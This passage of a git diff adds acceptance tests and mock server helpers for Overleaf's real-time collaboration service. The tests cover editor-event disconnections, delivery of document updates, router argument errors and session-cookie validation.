goes through two process.nextTick + // - disconnect goes through one process.nextTick + // We have to inject the disconnect event into a different event loop + // cycle. + 3 + ) + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + it('should not subscribe to the editor-events channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`editor-events:${this.project_id}`) + return done() + }) + return null + }) + + return it('should not subscribe to the applied-ops channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/ReceiveEditorEventTests.js b/services/real-time/test/acceptance/js/ReceiveEditorEventTests.js new file mode 100644 index 0000000..7e9fd93 --- /dev/null +++ b/services/real-time/test/acceptance/js/ReceiveEditorEventTests.js @@ -0,0 +1,367 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +describe('receiveEditorEvent', function () { + beforeEach(function (done) { + this.lines = ['test', 'doc', 'lines'] + this.version = 42 + this.ops = ['mock', 'doc', 'ops'] + + /** + * We will set up a project, a doc, and three users: the owner, user 'a' and user 'b' + */ + this.project_id = null + this.doc_id = null + + this.owner_user_id = null + this.owner_client = null + + this.user_a_id = null + this.user_a_client = null + + this.user_b_id = null + this.user_b_client = null + + this.user_c_id = null + this.user_c_client = null + + async.series( + [ + /** + * Create the project, doc, and owner + */ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + userMetadata: { isInvitedMember: true }, + }, + (error, { user_id: userId, project_id: projectId }) => { + if (error) return done(error) + this.owner_user_id = userId + this.project_id = projectId + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + /** + * Connect owner to project/doc + */ + cb => { + this.owner_client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.owner_client.emit('joinDoc', this.doc_id, cb) + }, + + /** + * add user_a to project, as an invited member + */ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + project_id: this.project_id, + userMetadata: { isTokenMember: false, isInvitedMember: true }, + }, + (error, { user_id: userIdSecond }) => { + if (error) 
return done(error) + this.user_a_id = userIdSecond + return cb() + } + ) + }, + + /** + * Connect user_a to project/doc + */ + cb => { + this.user_a_client = RealTimeClient.connect(this.project_id, cb) + }, + cb => { + return this.user_a_client.emit('joinDoc', this.doc_id, cb) + }, + + /** + * Set up user_b, as a token-access/link-sharing user + */ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + project_id: this.project_id, + userMetadata: { isTokenMember: true, isInvitedMember: false }, + }, + (error, { user_id: userIdThird }) => { + if (error) return done(error) + this.user_b_id = userIdThird + return cb() + } + ) + }, + + /** + * Connect user_b to project/doc + */ + cb => { + this.user_b_client = RealTimeClient.connect(this.project_id, cb) + }, + cb => { + return this.user_b_client.emit('joinDoc', this.doc_id, cb) + }, + + /** + * Set up user_c, as a 'restricted' user (anonymous read-only link-sharing) + */ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + project_id: this.project_id, + userMetadata: { + isTokenMember: false, + isInvitedMember: false, + isRestrictedUser: true, + }, + }, + (error, { user_id: userIdFourth }) => { + if (error) return done(error) + this.user_c_id = userIdFourth + return cb() + } + ) + }, + + /** + * Connect user_c to project/doc + */ + cb => { + this.user_c_client = RealTimeClient.connect(this.project_id, cb) + }, + cb => { + return this.user_c_client.emit('joinDoc', this.doc_id, cb) + }, + + // -------------- + + /** + * Listen for updates + */ + cb => { + this.owner_updates = [] + this.user_a_updates = [] + this.user_b_updates = [] + this.user_c_updates = [] + + const eventNames = [ + 'userRemovedFromProject', + 'project:publicAccessLevel:changed', + 'project:access:revoked', + ] + + for (const eventName of eventNames) { + this.owner_client.on(eventName, update => + this.owner_updates.push({ [eventName]: update }) + ) + this.user_a_client.on(eventName, update => + this.user_a_updates.push({ [eventName]: update }) + ) + this.user_b_client.on(eventName, update => + this.user_b_updates.push({ [eventName]: update }) + ) + this.user_c_client.on(eventName, update => + this.user_c_updates.push({ [eventName]: update }) + ) + } + + return cb() + }, + ], + done + ) + }) + + afterEach(function () { + if (this.owner_client) { + this.owner_client.disconnect() + } + if (this.user_a_client) { + this.user_a_client.disconnect() + } + if (this.user_b_client) { + this.user_b_client.disconnect() + } + if (this.user_c_client) { + this.user_c_client.disconnect() + } + }) + + describe('event: project:publicAccessLevel:changed, set to private', function () { + beforeEach(function (done) { + /** + * We turn off link sharing + */ + rclient.publish( + 'editor-events', + JSON.stringify({ + room_id: this.project_id, + message: 'project:publicAccessLevel:changed', + payload: [{ newAccessLevel: 'private' }], + }) + ) + setTimeout(done, 200) + }) + + it('should disconnect the token-access user, and restricted users', function () { + expect(this.user_b_client.socket.connected).to.equal(false) + expect(this.user_c_client.socket.connected).to.equal(false) + }) + + it('should not disconnect the other users', function () { + expect(this.owner_client.socket.connected).to.equal(true) + expect(this.user_a_client.socket.connected).to.equal(true) + }) + + it('should send the event to the remaining connected clients', function () { + expect(this.owner_updates).to.deep.equal([ + { 'project:publicAccessLevel:changed': { 
newAccessLevel: 'private' } }, + ]) + + expect(this.user_a_updates).to.deep.equal([ + { 'project:publicAccessLevel:changed': { newAccessLevel: 'private' } }, + ]) + }) + + it('should send a project:access:revoked message to the disconnected clients', function () { + expect(this.user_b_updates).to.deep.equal([ + { 'project:access:revoked': undefined }, + ]) + expect(this.user_c_updates).to.deep.equal([ + { 'project:access:revoked': undefined }, + ]) + }) + }) + + describe('event: project:publicAccessLevel:changed, set to tokenBased', function () { + beforeEach(function (done) { + /** + * We turn on link sharing + */ + rclient.publish( + 'editor-events', + JSON.stringify({ + room_id: this.project_id, + message: 'project:publicAccessLevel:changed', + payload: [{ newAccessLevel: 'tokenBased' }], + }) + ) + setTimeout(done, 200) + }) + + it('should not disconnect anyone', function () { + expect(this.owner_client.socket.connected).to.equal(true) + expect(this.user_a_client.socket.connected).to.equal(true) + expect(this.user_b_client.socket.connected).to.equal(true) + expect(this.user_c_client.socket.connected).to.equal(true) + }) + + it('should send the event to all non-restricted clients', function () { + expect(this.owner_updates).to.deep.equal([ + { + 'project:publicAccessLevel:changed': { newAccessLevel: 'tokenBased' }, + }, + ]) + + expect(this.user_a_updates).to.deep.equal([ + { + 'project:publicAccessLevel:changed': { newAccessLevel: 'tokenBased' }, + }, + ]) + + expect(this.user_b_updates).to.deep.equal([ + { + 'project:publicAccessLevel:changed': { newAccessLevel: 'tokenBased' }, + }, + ]) + // restricted users don't receive this type of message + expect(this.user_c_updates.length).to.equal(0) + }) + }) + + describe('event: userRemovedFromProject', function () { + let removedUserId + beforeEach(function (done) { + /** + * We remove user_a from the project + */ + removedUserId = `${this.user_a_id}` + rclient.publish( + 'editor-events', + JSON.stringify({ + room_id: this.project_id, + message: 'userRemovedFromProject', + payload: [removedUserId], + }) + ) + setTimeout(done, 200) + }) + + it('should disconnect the removed user', function () { + expect(this.user_a_client.socket.connected).to.equal(false) + }) + + it('should not disconnect the other users', function () { + expect(this.owner_client.socket.connected).to.equal(true) + expect(this.user_b_client.socket.connected).to.equal(true) + }) + + it('should send the event to the remaining connected clients', function () { + expect(this.owner_updates).to.deep.equal([ + { userRemovedFromProject: removedUserId }, + ]) + + expect(this.user_b_updates).to.deep.equal([ + { userRemovedFromProject: removedUserId }, + ]) + }) + + it('should send a project:access:revoked message to the disconnected clients', function () { + expect(this.user_a_updates).to.deep.equal([ + { 'project:access:revoked': undefined }, + ]) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/ReceiveUpdateTests.js b/services/real-time/test/acceptance/js/ReceiveUpdateTests.js new file mode 100644 index 0000000..6c7367a --- /dev/null +++ b/services/real-time/test/acceptance/js/ReceiveUpdateTests.js @@ -0,0 +1,312 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
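+//
+// A minimal sketch of the 'applied-ops' pub/sub message this suite publishes
+// (shape taken from the tests below; the field values are illustrative):
+//
+//   rclient.publish('applied-ops', JSON.stringify({
+//     doc_id: docId,
+//     op: {
+//       meta: { source: clientPublicId }, // only this client receives the ack
+//       v: version,
+//       doc: docId,
+//       op: [{ i: 'foo', p: 50 }], // insert 'foo' at position 50
+//     },
+//   }))
+//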
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockWebServer = require('./helpers/MockWebServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +describe('receiveUpdate', function () { + beforeEach(function (done) { + this.lines = ['test', 'doc', 'lines'] + this.version = 42 + this.ops = ['mock', 'doc', 'ops'] + + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + }, + (error, { user_id: userId, project_id: projectId }) => { + if (error) return done(error) + this.user_id = userId + this.project_id = projectId + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + this.clientB = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.clientB.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + }, + (error, { user_id: userIdSecond, project_id: projectIdSecond }) => { + if (error) return done(error) + this.user_id_second = userIdSecond + this.project_id_second = projectIdSecond + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id_second, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docIdSecond }) => { + this.doc_id_second = docIdSecond + return cb(e) + } + ) + }, + + cb => { + this.clientC = RealTimeClient.connect(this.project_id_second, cb) + }, + + cb => { + return this.clientC.emit('joinDoc', this.doc_id_second, cb) + }, + + cb => { + this.clientAUpdates = [] + this.clientA.on('otUpdateApplied', update => + this.clientAUpdates.push(update) + ) + this.clientBUpdates = [] + this.clientB.on('otUpdateApplied', update => + this.clientBUpdates.push(update) + ) + this.clientCUpdates = [] + this.clientC.on('otUpdateApplied', update => + this.clientCUpdates.push(update) + ) + + this.clientAErrors = [] + this.clientA.on('otUpdateError', error => + this.clientAErrors.push(error) + ) + this.clientBErrors = [] + this.clientB.on('otUpdateError', error => + this.clientBErrors.push(error) + ) + this.clientCErrors = [] + this.clientC.on('otUpdateError', error => + this.clientCErrors.push(error) + ) + return cb() + }, + ], + done + ) + }) + + afterEach(function () { + if (this.clientA != null) { + this.clientA.disconnect() + } + if (this.clientB != null) { + this.clientB.disconnect() + } + return this.clientC != null ? 
this.clientC.disconnect() : undefined + }) + + describe('with an update from clientA', function () { + beforeEach(function (done) { + this.update = { + doc_id: this.doc_id, + op: { + meta: { + source: this.clientA.publicId, + }, + v: this.version, + doc: this.doc_id, + op: [{ i: 'foo', p: 50 }], + }, + } + rclient.publish('applied-ops', JSON.stringify(this.update)) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should send the full op to clientB', function () { + return this.clientBUpdates.should.deep.equal([this.update.op]) + }) + + it('should send an ack to clientA', function () { + return this.clientAUpdates.should.deep.equal([ + { + v: this.version, + doc: this.doc_id, + }, + ]) + }) + + return it('should send nothing to clientC', function () { + return this.clientCUpdates.should.deep.equal([]) + }) + }) + + describe('with an update from clientC', function () { + beforeEach(function (done) { + this.update = { + doc_id: this.doc_id_second, + op: { + meta: { + source: this.clientC.publicId, + }, + v: this.version, + doc: this.doc_id_second, + op: [{ i: 'update from clientC', p: 50 }], + }, + } + rclient.publish('applied-ops', JSON.stringify(this.update)) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should send nothing to clientA', function () { + return this.clientAUpdates.should.deep.equal([]) + }) + + it('should send nothing to clientB', function () { + return this.clientBUpdates.should.deep.equal([]) + }) + + return it('should send an ack to clientC', function () { + return this.clientCUpdates.should.deep.equal([ + { + v: this.version, + doc: this.doc_id_second, + }, + ]) + }) + }) + + describe('with an update from a remote client for project 1', function () { + beforeEach(function (done) { + this.update = { + doc_id: this.doc_id, + op: { + meta: { + source: 'this-is-a-remote-client-id', + }, + v: this.version, + doc: this.doc_id, + op: [{ i: 'foo', p: 50 }], + }, + } + rclient.publish('applied-ops', JSON.stringify(this.update)) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should send the full op to clientA', function () { + return this.clientAUpdates.should.deep.equal([this.update.op]) + }) + + it('should send the full op to clientB', function () { + return this.clientBUpdates.should.deep.equal([this.update.op]) + }) + + return it('should send nothing to clientC', function () { + return this.clientCUpdates.should.deep.equal([]) + }) + }) + + describe('with an error for the first project', function () { + beforeEach(function (done) { + rclient.publish( + 'applied-ops', + JSON.stringify({ + doc_id: this.doc_id, + error: (this.error = 'something went wrong'), + }) + ) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should send the error to the clients in the first project', function () { + this.clientAErrors.should.deep.equal([this.error]) + return this.clientBErrors.should.deep.equal([this.error]) + }) + + it('should not send any errors to the client in the second project', function () { + return this.clientCErrors.should.deep.equal([]) + }) + + it('should disconnect the clients of the first project', function () { + this.clientA.socket.connected.should.equal(false) + return this.clientB.socket.connected.should.equal(false) + }) + + return it('should not disconnect the client in the second project', function () { + return this.clientC.socket.connected.should.equal(true) + }) + }) + + return describe('with an error for the second project', function () { 
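+    // Mirrors the first-project error case above, but publishes the error
+    // for doc_id_second, so only clientC should be affected.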
+ beforeEach(function (done) { + rclient.publish( + 'applied-ops', + JSON.stringify({ + doc_id: this.doc_id_second, + error: (this.error = 'something went wrong'), + }) + ) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should not send any errors to the clients in the first project', function () { + this.clientAErrors.should.deep.equal([]) + return this.clientBErrors.should.deep.equal([]) + }) + + it('should send the error to the client in the second project', function () { + return this.clientCErrors.should.deep.equal([this.error]) + }) + + it('should not disconnect the clients of the first project', function () { + this.clientA.socket.connected.should.equal(true) + return this.clientB.socket.connected.should.equal(true) + }) + + return it('should disconnect the client in the second project', function () { + return this.clientC.socket.connected.should.equal(false) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/RouterTests.js b/services/real-time/test/acceptance/js/RouterTests.js new file mode 100644 index 0000000..e3493a6 --- /dev/null +++ b/services/real-time/test/acceptance/js/RouterTests.js @@ -0,0 +1,105 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const async = require('async') +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +describe('Router', function () { + return describe('joinProject', function () { + describe('when there is no callback provided', function () { + after(function () { + return process.removeListener('unhandledRejection', this.onUnhandled) + }) + + before(function (done) { + this.onUnhandled = error => done(error) + process.on('unhandledRejection', this.onUnhandled) + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + return it('should keep on going', function () { + return expect('still running').to.exist + }) + }) + + return describe('when there are too many arguments', function () { + after(function () { + return process.removeListener('unhandledRejection', this.onUnhandled) + }) + + before(function (done) { + this.onUnhandled = error => done(error) + process.on('unhandledRejection', this.onUnhandled) + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', 1, 2, 3, 4, 5, error => { + this.error = error + return cb() + }) + }, + ], + done + ) + }) + + return it('should return an error message', function () { + return expect(this.error.message).to.equal('unexpected arguments') + }) + }) + }) +}) diff --git 
a/services/real-time/test/acceptance/js/SessionSocketsTests.js b/services/real-time/test/acceptance/js/SessionSocketsTests.js new file mode 100644 index 0000000..cca7f75 --- /dev/null +++ b/services/real-time/test/acceptance/js/SessionSocketsTests.js @@ -0,0 +1,140 @@ +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') +const Settings = require('@overleaf/settings') +const signature = require('cookie-signature') +const { expect } = require('chai') + +describe('SessionSockets', function () { + beforeEach(function (done) { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + }, + (err, options) => { + if (err) return done(err) + + this.checkSocket = function (fn) { + RealTimeClient.connect(options.project_id, fn) + } + done() + } + ) + }) + + describe('without cookies', function () { + beforeEach(function () { + RealTimeClient.cookie = null + }) + + it('should return a lookup error', function (done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) + + describe('with a different cookie', function () { + beforeEach(function () { + RealTimeClient.cookie = 'some.key=someValue' + }) + + it('should return a lookup error', function (done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) + + describe('with an invalid cookie', function () { + beforeEach(function (done) { + RealTimeClient.setSession({}, error => { + if (error) { + return done(error) + } + RealTimeClient.cookie = `${ + Settings.cookieName + }=${RealTimeClient.cookie.slice(17, 49)}` + done() + }) + }) + + it('should return a lookup error', function (done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) + + describe('with a valid cookie and no matching session', function () { + beforeEach(function () { + RealTimeClient.cookie = `${Settings.cookieName}=unknownId` + }) + + it('should return a lookup error', function (done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) + + describe('with a valid cookie and a matching session', function () { + it('should not return an error', function (done) { + this.checkSocket(error => { + expect(error).to.not.exist + done() + }) + }) + }) + + describe('with a cookie signed by the fallback key and a matching session', function () { + beforeEach(function () { + RealTimeClient.cookie = + RealTimeClient.cookieSignedWith.sessionSecretFallback + }) + it('should not return an error', function (done) { + this.checkSocket(error => { + expect(error).to.not.exist + done() + }) + }) + }) + + describe('with a cookie signed by the upcoming key and a matching session', function () { + beforeEach(function () { + RealTimeClient.cookie = + RealTimeClient.cookieSignedWith.sessionSecretUpcoming + }) + it('should not return an error', function (done) { + this.checkSocket(error => { + expect(error).to.not.exist + done() + }) + }) + }) + + describe('with a cookie signed with an unrecognized secret and a matching session', function () { + beforeEach(function () { + const [sessionKey] = RealTimeClient.cookie.split('.') + // sign the session key with a unrecognized secret + RealTimeClient.cookie = signature.sign( + sessionKey, + 'unrecognised-session-secret' + ) + }) + it('should return a lookup error', function 
(done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/SessionTests.js b/services/real-time/test/acceptance/js/SessionTests.js new file mode 100644 index 0000000..819ec26 --- /dev/null +++ b/services/real-time/test/acceptance/js/SessionTests.js @@ -0,0 +1,55 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const FixturesManager = require('./helpers/FixturesManager') +const RealTimeClient = require('./helpers/RealTimeClient') + +describe('Session', function () { + return describe('with an established session', function () { + before(function (done) { + FixturesManager.setUpProject( + { privilegeLevel: 'owner' }, + (error, options) => { + if (error) return done(error) + this.client = RealTimeClient.connect(options.project_id, done) + } + ) + return null + }) + + it('should not get disconnected', function (done) { + let disconnected = false + this.client.on('disconnect', () => (disconnected = true)) + return setTimeout(() => { + expect(disconnected).to.equal(false) + return done() + }, 500) + }) + + return it('should appear in the list of connected clients', function (done) { + return RealTimeClient.getConnectedClients((error, clients) => { + if (error) return done(error) + let included = false + for (const client of Array.from(clients)) { + if (client.client_id === this.client.socket.sessionid) { + included = true + break + } + } + expect(included).to.equal(true) + return done() + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/helpers/FixturesManager.js b/services/real-time/test/acceptance/js/helpers/FixturesManager.js new file mode 100644 index 0000000..1db0c68 --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/FixturesManager.js @@ -0,0 +1,156 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
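+//
+// Typical usage, as exercised by the acceptance tests (a sketch; the
+// callback shapes follow the implementations below):
+//
+//   FixturesManager.setUpProject(
+//     { privilegeLevel: 'owner', project: { name: 'Test Project' } },
+//     (error, { project_id: projectId, user_id: userId }) => {
+//       FixturesManager.setUpDoc(
+//         projectId,
+//         { lines: ['doc', 'lines'] },
+//         (err, { doc_id: docId }) => {
+//           // connect a RealTimeClient and emit 'joinDoc' here
+//         }
+//       )
+//     }
+//   )
+//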
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let FixturesManager +const RealTimeClient = require('./RealTimeClient') +const MockWebServer = require('./MockWebServer') +const MockDocUpdaterServer = require('./MockDocUpdaterServer') + +module.exports = FixturesManager = { + setUpProject(options, callback) { + if (options == null) { + options = {} + } + if (callback == null) { + callback = function () {} + } + if (!options.user_id) { + options.user_id = FixturesManager.getRandomId() + } + if (!options.project_id) { + options.project_id = FixturesManager.getRandomId() + } + if (!options.project) { + options.project = { name: 'Test Project' } + } + let { + project_id: projectId, + user_id: userId, + privilegeLevel, + project, + publicAccess, + userMetadata, + anonymousAccessToken, + } = options + + if (privilegeLevel === 'owner') { + project.owner = { _id: userId } + } else { + project.owner = { _id: '404404404404404404404404' } + } + + const privileges = {} + privileges[userId] = privilegeLevel + if (publicAccess) { + anonymousAccessToken = + anonymousAccessToken || FixturesManager.getRandomId() + privileges[anonymousAccessToken] = publicAccess + } + + const metadataByUser = {} + metadataByUser[userId] = userMetadata + + MockWebServer.createMockProject( + projectId, + privileges, + project, + metadataByUser + ) + return MockWebServer.run(error => { + if (error != null) { + throw error + } + return RealTimeClient.setSession( + { + user: { + _id: userId, + first_name: 'Joe', + last_name: 'Bloggs', + }, + }, + error => { + if (error != null) { + throw error + } + return callback(null, { + project_id: projectId, + user_id: userId, + privilegeLevel, + project, + anonymousAccessToken, + }) + } + ) + }) + }, + + setUpDoc(projectId, options, callback) { + if (options == null) { + options = {} + } + if (callback == null) { + callback = function () {} + } + if (!options.doc_id) { + options.doc_id = FixturesManager.getRandomId() + } + if (!options.lines) { + options.lines = ['doc', 'lines'] + } + if (!options.version) { + options.version = 42 + } + if (!options.ops) { + options.ops = ['mock', 'ops'] + } + const { doc_id: docId, lines, version, ops, ranges } = options + + MockDocUpdaterServer.createMockDoc(projectId, docId, { + lines, + version, + ops, + ranges, + }) + return MockDocUpdaterServer.run(error => { + if (error != null) { + throw error + } + return callback(null, { + project_id: projectId, + doc_id: docId, + lines, + version, + ops, + }) + }) + }, + + setUpEditorSession(options, callback) { + FixturesManager.setUpProject(options, (err, detailsProject) => { + if (err) return callback(err) + + FixturesManager.setUpDoc( + detailsProject.project_id, + options, + (err, detailsDoc) => { + if (err) return callback(err) + + callback(null, Object.assign({}, detailsProject, detailsDoc)) + } + ) + }) + }, + + getRandomId() { + return require('node:crypto') + .createHash('sha1') + .update(Math.random().toString()) + .digest('hex') + .slice(0, 24) + }, +} diff --git a/services/real-time/test/acceptance/js/helpers/MockDocUpdaterServer.js b/services/real-time/test/acceptance/js/helpers/MockDocUpdaterServer.js new file mode 100644 index 0000000..29d5718 --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/MockDocUpdaterServer.js @@ -0,0 +1,91 @@ +/* eslint-disable + no-return-assign, +*/ 
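+// This mock stands in for the document-updater service on port 3003; the
+// real-time service reads docs from it over HTTP. Roughly (illustrative
+// values, routes as registered in run() below):
+//   GET    /project/<projectId>/doc/<docId>?fromVersion=42  -> doc fixture JSON
+//   DELETE /project/<projectId>                             -> 204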
+// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let MockDocUpdaterServer +const sinon = require('sinon') +const express = require('express') + +module.exports = MockDocUpdaterServer = { + docs: {}, + + createMockDoc(projectId, docId, data) { + return (MockDocUpdaterServer.docs[`${projectId}:${docId}`] = data) + }, + + getDocument(projectId, docId, fromVersion, callback) { + if (callback == null) { + callback = function () {} + } + return callback(null, MockDocUpdaterServer.docs[`${projectId}:${docId}`]) + }, + + deleteProject: sinon.stub().callsArg(1), + + getDocumentRequest(req, res, next) { + const { project_id: projectId, doc_id: docId } = req.params + let { fromVersion } = req.query + fromVersion = parseInt(fromVersion, 10) + return MockDocUpdaterServer.getDocument( + projectId, + docId, + fromVersion, + (error, data) => { + if (error != null) { + return next(error) + } + if (!data) { + return res.sendStatus(404) + } + return res.json(data) + } + ) + }, + + deleteProjectRequest(req, res, next) { + const { project_id: projectId } = req.params + return MockDocUpdaterServer.deleteProject(projectId, error => { + if (error != null) { + return next(error) + } + return res.sendStatus(204) + }) + }, + + running: false, + run(callback) { + if (callback == null) { + callback = function () {} + } + if (MockDocUpdaterServer.running) { + return callback() + } + const app = express() + app.get( + '/project/:project_id/doc/:doc_id', + MockDocUpdaterServer.getDocumentRequest + ) + app.delete( + '/project/:project_id', + MockDocUpdaterServer.deleteProjectRequest + ) + return app + .listen(3003, error => { + MockDocUpdaterServer.running = true + return callback(error) + }) + .on('error', error => { + console.error('error starting MockDocUpdaterServer:', error.message) + return process.exit(1) + }) + }, +} + +sinon.spy(MockDocUpdaterServer, 'getDocument') diff --git a/services/real-time/test/acceptance/js/helpers/MockWebServer.js b/services/real-time/test/acceptance/js/helpers/MockWebServer.js new file mode 100644 index 0000000..138db1f --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/MockWebServer.js @@ -0,0 +1,106 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
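+// This mock stands in for the web service on port 3000. A join request and
+// its response look roughly like this (values illustrative; the shape matches
+// joinProjectRequest below):
+//   POST /project/<projectId>/join   body: { userId, anonymousAccessToken }
+//   200  { project, privilegeLevel, isRestrictedUser, isTokenMember, isInvitedMember }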
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let MockWebServer +const sinon = require('sinon') +const express = require('express') +const bodyParser = require('body-parser') + +module.exports = MockWebServer = { + projects: {}, + privileges: {}, + userMetadata: {}, + + createMockProject(projectId, privileges, project, metadataByUser) { + MockWebServer.privileges[projectId] = privileges + MockWebServer.userMetadata[projectId] = metadataByUser + return (MockWebServer.projects[projectId] = project) + }, + + inviteUserToProject(projectId, user, privileges) { + MockWebServer.privileges[projectId][user._id] = privileges + MockWebServer.userMetadata[projectId][user._id] = user + }, + + joinProject(projectId, userId, anonymousAccessToken, callback) { + if (callback == null) { + callback = function () {} + } + const project = MockWebServer.projects[projectId] + const privilegeLevel = + MockWebServer.privileges[projectId]?.[userId] || + MockWebServer.privileges[projectId]?.[anonymousAccessToken] + const userMetadata = MockWebServer.userMetadata[projectId]?.[userId] + return callback(null, project, privilegeLevel, userMetadata) + }, + + joinProjectRequest(req, res, next) { + const { project_id: projectId } = req.params + const { anonymousAccessToken, userId } = req.body + if (projectId === '404404404404404404404404') { + // not-found + return res.status(404).send() + } + if (projectId === '403403403403403403403403') { + // forbidden + return res.status(403).send() + } + if (projectId === '429429429429429429429429') { + // rate-limited + return res.status(429).send() + } else { + return MockWebServer.joinProject( + projectId, + userId, + anonymousAccessToken, + (error, project, privilegeLevel, userMetadata) => { + if (error != null) { + return next(error) + } + if (!project) { + return res.sendStatus(404) + } + return res.json({ + project, + privilegeLevel, + isRestrictedUser: 